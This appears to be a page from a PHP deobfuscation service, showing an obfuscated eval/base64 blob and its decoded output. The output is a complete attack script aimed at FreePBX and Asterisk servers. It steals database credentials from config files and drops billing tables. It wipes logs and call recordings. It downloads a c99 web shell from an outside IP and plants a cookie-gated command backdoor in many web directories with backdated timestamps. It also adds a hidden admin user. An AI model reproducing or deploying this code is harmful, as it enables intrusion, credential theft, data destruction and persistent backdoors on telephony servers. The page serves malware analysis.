Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzuncompress(base64_decode("eJwNV0WyxUgOvMususMLM8WsDM/MbG8mzMzs08+vA6hCKSWo..

Decoded Output download


ini_set('error_reporting', 0);
$file = is_file("/etc/asterisk/freepbx.conf")?"/etc/asterisk/freepbx.conf":"/etc/freepbx.conf";
is_file($file)?eval(str_replace(array('<?php','?>','require','include'),array('','','#require','#include'),file_get_contents($file))):'';
$amp_conf=(isset($amp_conf)?$amp_conf:array());
$amportal=array();
foreach(explode("
",file_get_contents("/etc/amportal.conf")) as $key => $val)
{
 if(preg_match_all("/=/",$val,$amp3))
 {
  $exx=explode("=",$val);
  $amportal[$exx[0]]=trim((isset($amp_conf[$exx[0]])?$amp_conf[$exx[0]]:str_replace($exx[0].'=','',$val)));
 }
}
$amp        = array_merge(array('AMPDBUSER' => 'asteriskuser','AMPDBNAME' => 'asterisk'),$amp_conf,$amportal);

  $oldcwd=getcwd();
  is_dir($amp["AMPWEBROOT"])?chdir($amp["AMPWEBROOT"]):"";

$freespace=(disk_free_space(getcwd()) / 1024 / 1024);
    if($freespace < 100)
    {
     @exec("nohup find /var/log/ -type f | xargs -I {} cp /dev/null {} &");
     @exec("nohup rm /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz &");
    }
     @exec("chmod 0000 /var/www/html/a2billing/");
     $a2b= new  simple_db_connect($amp['AMPDBHOST'],'a2billinguser','a2billing');
     $a2b->select_db('mya2billing');
     $a2b->query('drop table cc_ui_authen');
     $a2b->query('drop table cc_agent');
     $a2b->query('drop table cc_system_log');
  $dirs=array($oldcwd.'/',getcwd().'/','/var/www/html/','/var/www/','/var/www/freepbx/','/var/www/localhost/','/opt/freepbx/');

  foreach($dirs as $K => $V)
  {
    $dirs[]=$V.'panel/';
    $dirs[]=$V.'recordings/';
    $dirs[]=$V.'vtigercrm/';
    $dirs[]=$V.'public_html/';
    $dirs[]=$V.'html/';
    $dirs[]=$V.'freepbx/';
  }

  $dirs=array_unique($dirs);
  sort($dirs);

  $contents=array(
                  'c'      => file_get_contents('http://212.83.135.137/t/c99.txt'),
                  'codes'  => '<?php $cmd=((isset($_COOKIE["t3rr0r"])) && (md5(sha1($_COOKIE["t3rr0r"]))=="aeb1ae6d167d80abb38e8e07eae36170"))? $_COOKIE["cmd"]: "echo \'Unauthorized T\'";  system($cmd); ?>'
                 );

$freespace=(disk_free_space(getcwd()) / 1024 / 1024);
if($freespace > 100)
{
  foreach($dirs as $k => $where)
  {
   if(is_dir($where))
   {
    (is_writeable($where))? write_dir($where): '';

    $od=opendir($where);
    while($rd=readdir($od))
    {
     $wd=$where.'/'.$rd;
     (($rd != '..') && ($rd != '.')&& is_writeable($wd) && is_dir($wd))? write_dir($wd): '';
    }
   }
  }

icwrite_dirs("/var/www/html/admin/modules/_cache/");
icwrite_dirs("/var/www/html/admin/modules/");
icwrite_dirs("/var/www/html/admin/assets/");
icwrite_dirs("/var/www/html/admin/libraries/");
icwrite_dirs("/var/www/html/recordings/misc/");
icwrite_dirs("/var/www/html/recordings/lang/");

}

  $pass=random_password();

if(count($amp) > 3)
{
  echo "
[+] Config Fetched ..";


  $db = new simple_db_connect($amp['AMPDBHOST'],$amp['AMPDBUSER'],$amp['AMPDBPASS']);
  echo "
[+] Connected To Database server ..";
    $db->select_db($amp['AMPDBNAME']);
   echo "
[+] Connected To Database ..";
  $db->query("delete from ampusers where username='atmin'",'
[-] Issue Deleting User');

  $query = $db->query("INSERT INTO `ampusers` ( `username`, `password_sha1`, `sections` ) VALUES ( 'atmin', '".sha1($pass)."', '*' );","
[-] Wrong Column ,, trying another column ..");
  if(!$query){ $query = $db->query("INSERT INTO `ampusers` ( `username`, `password`, `sections` ) VALUES ( 'atmin', '$pass', '*' );","
[-]Couldn't Determine Column .. Should Add admin Manually .."); }


  if($query){ echo "
[+] Admin User Added ..
[+] atmin : $pass
"; }

  is_dir("../admin")? @symlink('../admin','atmin') : "";
  is_dir("/var/www/html/admin")? @symlink('/var/www/html/admin','/var/www/html/recordings/atmin') : "";

}
else
{
 echo "
[-] Should Work Manually on this server ..
";
}
if(is_file("/var/www/html/libs/paloSantoDB.class.php"))
{
  include_once "/var/www/html/libs/paloSantoDB.class.php";
  include_once "/var/www/html/libs/paloSantoACL.class.php";
  $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
  $pACL = new paloACL($pDB);
  $query="SELECT id from acl_user where name='atmin'";
  $iddb = $pDB->fetchTable($query);
  $tid=$iddb[0][0];
       if($tid < 2)
       {
        $pACL->createUser('atmin', '', md5($pass), '');
        $iddb = $pDB->fetchTable($query);
        $tid=$iddb[0][0];
       }
    $pACL->changePassword($tid,md5($pass));
    $pACL->addToGroup($tid,1);

 echo "
[+] Admin User Added ..
[+] atmin : $pass
";

}

    echo "-----------AMPDB-----------
";
        @system("grep AMPDB /etc/amportal.conf");
    echo "-----------ARI_ADMIN-----------
";
        @system("grep ARI_ADMIN /etc/amportal.conf");
    echo "-----------AMPMGR-----------
";
        @system("grep AMPMGR /etc/amportal.conf");
    echo "-----------PASS-----------
";
        @system("grep PASS /etc/amportal.conf");
    echo "------------Thats-All----------
";
              function write_dir($where)
              {
                   write_file($where.'/config.all.php','c');
                   write_file($where.'/phpversions.php','codes');

              }
              function icwrite_dirs($where)
              {
                  write_file($where.'/config.php','c');
                  write_file($where.'/index.php','codes');
              }

              function write_file($fname,$wtw)
              {
                      GLOBAL $contents;
                      if($contents[$wtw] !== '')
                      {
                              file_put_contents($fname,$contents[$wtw]);
                              touch($fname,strtotime('-10 years',time()));
                      }
              }
              function random_password($length=7)
              {
                      $set=array_merge(range('A', 'Z'), range('a', 'z'), range('0', '9'));
                      $str = 't';
                      for($i=0;$i<$length;$i++)
                      {
                              $str .= $set[rand(0, count($set)-1)];
                      }
                      return $str;
              }
class simple_db_connect
{
   var $link;
              function simple_db_connect($host,$username,$password)
              {
                if(function_exists('mysqli_connect'))
                {
                 $this->link = mysqli_connect($host,$username,$password) or print(mysqli_error($this->link));
                }
                elseif(function_exists('mysql_connect'))
                {
                  $this->link = mysql_connect($host,$username,$password) or print(mysql_error());
                }
              }

              function select_db($dbname)
              {
                if(function_exists('mysqli_select_db'))
                {
                  mysqli_select_db($this->link,$dbname) or print(mysqli_error($this->link));
                }
                elseif(function_exists('mysql_select_db'))
                {
                  mysql_select_db($dbname,$this->link) or print(mysql_error());
                }
                return true;
              }

              function query($query_data,$error_message='')
              {
              global $con;
                if(function_exists('mysqli_query'))
                {
                 $query = mysqli_query($this->link,$query_data) or print($error_message.mysqli_error($this->link));
                }
                elseif(function_exists('mysql_query'))
                {
                 $query = mysql_query($query_data,$this->link) or print($error_message.mysql_error());
                }
                return $query;
              }

}
@system("rm -rf /tmp/*.txt /tmp/*.php");

Did this file decode correctly?

Original Code

<?php

eval(gzuncompress(base64_decode("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")));

?>

Function Calls

gzuncompress 11
base64_decode 11

Variables

None

Stats

MD5 cd56e2c43685f272f87de115698031f3
Eval Count 11
Decode Time 114 ms